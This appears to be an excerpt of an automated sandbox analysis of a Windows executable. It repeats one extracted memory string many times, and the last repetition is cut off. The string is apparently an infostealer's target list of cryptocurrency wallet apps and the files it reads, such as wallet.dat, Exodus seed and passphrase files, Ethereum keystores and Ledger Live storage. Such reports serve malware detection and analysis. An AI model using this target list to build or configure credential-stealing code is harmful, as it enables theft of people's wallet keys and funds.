Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local 